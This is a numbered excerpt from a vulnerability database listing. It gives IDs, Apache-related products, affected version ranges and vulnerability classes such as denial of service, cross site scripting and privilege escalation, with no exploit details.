5668| [72877] Apache Cordova 3.5.0 cross site request forgery
5669| [72876] Apache Cordova 3.5.0 cross site request forgery
5670| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
5671| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
5672| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
5673| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
5674| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5675| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5676| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
5677| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
5678| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
5679| [71629] Apache Axis2/C spoofing
5680| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
5681| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
5682| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
5683| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
5684| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
5685| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
5686| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
5687| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
5688| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
5689| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
5690| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
5691| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
5692| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
5693| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
5694| [70809] Apache POI up to 3.11 Crash denial of service
5695| [70808] Apache POI up to 3.10 unknown vulnerability
5696| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
5697| [70749] Apache Axis up to 1.4 getCN spoofing
5698| [70701] Apache Traffic Server up to 3.3.5 denial of service
5699| [70700] Apache OFBiz up to 12.04.03 cross site scripting
5700| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
5701| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
5702| [70661] Apache Subversion up to 1.6.17 denial of service
5703| [70660] Apache Subversion up to 1.6.17 spoofing
5704| [70659] Apache Subversion up to 1.6.17 spoofing
5705| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
5706| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
5707| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
5708| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
5709| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
5710| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
5711| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
5712| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
5713| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
5714| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
5715| [69846] Apache HBase up to 0.94.8 information disclosure
5716| [69783] Apache CouchDB up to 1.2.0 memory corruption
5717| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
5718| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
5719| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
5720| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
5721| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
5722| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
5723| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
5724| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
5725| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
5726| [69431] Apache Archiva up to 1.3.6 cross site scripting
5727| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
5728| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
5729| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
5730| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
5731| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
5732| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
5733| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
5734| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
5735| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
5736| [66739] Apache Camel up to 2.12.2 unknown vulnerability
5737| [66738] Apache Camel up to 2.12.2 unknown vulnerability
5738| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
5739| [66695] Apache CouchDB up to 1.2.0 cross site scripting
5740| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
5741| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
5742| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
5743| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
5744| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
5745| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
5746| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
5747| [66356] Apache Wicket up to 6.8.0 information disclosure
5748| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
5749| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
5750| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5751| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
5752| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
5753| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5754| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5755| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
5756| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
5757| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
5758| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
5759| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
5760| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
5761| [65668] Apache Solr 4.0.0 Updater denial of service
5762| [65665] Apache Solr up to 4.3.0 denial of service
5763| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
5764| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
5765| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
5766| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
5767| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
5768| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
5769| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
5770| [65410] Apache Struts 2.3.15.3 cross site scripting
5771| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
5772| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
5773| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
5774| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
5775| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
5776| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
5777| [65340] Apache Shindig 2.5.0 information disclosure
5778| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
5779| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
5780| [10826] Apache Struts 2 File privilege escalation
5781| [65204] Apache Camel up to 2.10.1 unknown vulnerability
5782| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
5783| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
5784| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
5785| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
5786| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
5787| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
5788| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
5789| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
5790| [64722] Apache XML Security for C++ Heap-based memory corruption
5791| [64719] Apache XML Security for C++ Heap-based memory corruption
5792| [64718] Apache XML Security for C++ verify denial of service
5793| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
5794| [64716] Apache XML Security for C++ spoofing
5795| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
5796| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
5797| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
5798| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
5799| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
5800| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
5801| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
5802| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
5803| [64485] Apache Struts up to 2.2.3.0 privilege escalation
5804| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
5805| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
5806| [64467] Apache Geronimo 3.0 memory corruption
5807| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
5808| [64457] Apache Struts up to 2.2.3.0 cross site scripting
5809| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
5810| [9184] Apache Qpid up to 0.20 SSL misconfiguration
5811| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
5812| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
5813| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
5814| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
5815| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
5816| [8873] Apache Struts 2.3.14 privilege escalation
5817| [8872] Apache Struts 2.3.14 privilege escalation
5818| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
5819| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
5820| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
5821| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
5822| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
5823| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5824| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5825| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
5826| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
5827| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
5828| [64006] Apache ActiveMQ up to 5.7.0 denial of service
5829| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
5830| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
5831| [8427] Apache Tomcat Session Transaction weak authentication
5832| [63960] Apache Maven 3.0.4 Default Configuration spoofing
5833| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
5834| [63750] Apache qpid up to 0.20 checkAvailable denial of service
5835| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
5836| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
5837| [63747] Apache Rave up to 0.20 User Account information disclosure
5838| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
5839| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
5840| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
5841| [7687] Apache CXF up to 2.7.2 Token weak authentication
5842| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5843| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5844| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
5845| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
5846| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
5847| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
5848| [63090] Apache Tomcat up to 4.1.24 denial of service
5849| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
5850| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
5851| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
5852| [62833] Apache CXF -/2.6.0 spoofing
5853| [62832] Apache Axis2 up to 1.6.2 spoofing
5854| [62831] Apache Axis up to 1.4 Java Message Service spoofing
5855| [62830] Apache Commons-httpclient 3.0 Payments spoofing
5856| [62826] Apache Libcloud up to 0.11.0 spoofing
5857| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
5858| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
5859| [62661] Apache Axis2 unknown vulnerability
5860| [62658] Apache Axis2 unknown vulnerability
5861| [62467] Apache Qpid up to 0.17 denial of service
5862| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
5863| [6301] Apache HTTP Server mod_pagespeed cross site scripting
5864| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
5865| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
5866| [62035] Apache Struts up to 2.3.4 denial of service
5867| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
5868| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
5869| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
5870| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
5871| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
5872| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
5873| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
5874| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
5875| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
5876| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
5877| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
5878| [61229] Apache Sling up to 2.1.1 denial of service
5879| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
5880| [61094] Apache Roller up to 5.0 cross site scripting
5881| [61093] Apache Roller up to 5.0 cross site request forgery
5882| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
5883| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
5884| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
5885| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
5886| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
5887| [60708] Apache Qpid 0.12 unknown vulnerability
5888| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
5889| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
5890| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
5891| [4882] Apache Wicket up to 1.5.4 directory traversal
5892| [4881] Apache Wicket up to 1.4.19 cross site scripting
5893| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
5894| [60352] Apache Struts up to 2.2.3 memory corruption
5895| [60153] Apache Portable Runtime up to 1.4.3 denial of service
5896| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
5897| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
5898| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
5899| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
5900| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
5901| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
5902| [4571] Apache Struts up to 2.3.1.2 privilege escalation
5903| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
5904| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
5905| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
5906| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
5907| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
5908| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
5909| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5910| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
5911| [59888] Apache Tomcat up to 6.0.6 denial of service
5912| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
5913| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
5914| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
5915| [59850] Apache Geronimo up to 2.2.1 denial of service
5916| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
5917| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
5918| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
5919| [58413] Apache Tomcat up to 6.0.10 spoofing
5920| [58381] Apache Wicket up to 1.4.17 cross site scripting
5921| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
5922| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
5923| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
5924| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
5925| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5926| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
5927| [57568] Apache Archiva up to 1.3.4 cross site scripting
5928| [57567] Apache Archiva up to 1.3.4 cross site request forgery
5929| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
5930| [4355] Apache HTTP Server APR apr_fnmatch denial of service
5931| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
5932| [57425] Apache Struts up to 2.2.1.1 cross site scripting
5933| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
5934| [57025] Apache Tomcat up to 7.0.11 information disclosure
5935| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
5936| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
5937| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5938| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
5939| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
5940| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
5941| [56512] Apache Continuum up to 1.4.0 cross site scripting
5942| [4285] Apache Tomcat 5.x JVM getLocale denial of service
5943| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
5944| [4283] Apache Tomcat 5.x ServletContect privilege escalation
5945| [56441] Apache Tomcat up to 7.0.6 denial of service
5946| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
5947| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
5948| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
5949| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
5950| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
5951| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
5952| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
5953| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
5954| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
5955| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
5956| [54693] Apache Traffic Server DNS Cache unknown vulnerability
5957| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
5958| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
5959| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5960| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5961| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5962| [54012] Apache Tomcat up to 6.0.10 denial of service
5963| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5964| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5965| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5966| [52894] Apache Tomcat up to 6.0.7 information disclosure
5967| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5968| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5969| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5970| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5971| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5972| [52584] Apache CouchDB up to 0.10.1 information disclosure
5973| [51757] Apache HTTP Server 2.0.44 cross site scripting
5974| [51756] Apache HTTP Server 2.0.44 spoofing
5975| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5976| [51690] Apache Tomcat up to 6.0 directory traversal
5977| [51689] Apache Tomcat up to 6.0 information disclosure
5978| [51688] Apache Tomcat up to 6.0 directory traversal
5979| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5980| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5981| [50626] Apache Solr 1.0.0 cross site scripting
5982| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
5983| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5984| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5985| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5986| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5987| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5988| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5989| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5990| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5991| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5992| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5993| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5994| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5995| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
5996| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5997| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5998| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5999| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
6000| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
6001| [47214] Apachefriends xampp 1.6.8 spoofing
6002| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
6003| [47162] Apachefriends XAMPP 1.4.4 weak authentication
6004| [47065] Apache Tomcat 4.1.23 cross site scripting
6005| [46834] Apache Tomcat up to 5.5.20 cross site scripting
6006| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
6007| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
6008| [86625] Apache Struts directory traversal
6009| [44461] Apache Tomcat up to 5.5.0 information disclosure
6010| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
6011| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
6012| [43663] Apache Tomcat up to 6.0.16 directory traversal
6013| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
6014| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
6015| [43516] Apache Tomcat up to 4.1.20 directory traversal
6016| [43509] Apache Tomcat up to 6.0.13 cross site scripting
6017| [42637] Apache Tomcat up to 6.0.16 cross site scripting
6018| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
6019| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
6020| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
6021| [40924] Apache Tomcat up to 6.0.15 information disclosure
6022| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
6023| [40922] Apache Tomcat up to 6.0 information disclosure
6024| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
6025| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
6026| [40656] Apache Tomcat 5.5.20 information disclosure
6027| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
6028| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
6029| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
6030| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
6031| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
6032| [40234] Apache Tomcat up to 6.0.15 directory traversal
6033| [40221] Apache HTTP Server 2.2.6 information disclosure
6034| [40027] David Castro Apache Authcas 0.4 sql injection
6035| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
6036| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
6037| [3414] Apache Tomcat WebDAV Stored privilege escalation
6038| [39489] Apache Jakarta Slide up to 2.1 directory traversal
6039| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
6040| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
6041| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
6042| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
6043| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
6044| [38524] Apache Geronimo 2.0 unknown vulnerability
6045| [3256] Apache Tomcat up to 6.0.13 cross site scripting
6046| [38331] Apache Tomcat 4.1.24 information disclosure
6047| [38330] Apache Tomcat 4.1.24 information disclosure
6048| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
6049| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
6050| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
6051| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
6052| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
6053| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
6054| [37292] Apache Tomcat up to 5.5.1 cross site scripting
6055| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
6056| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
6057| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
6058| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
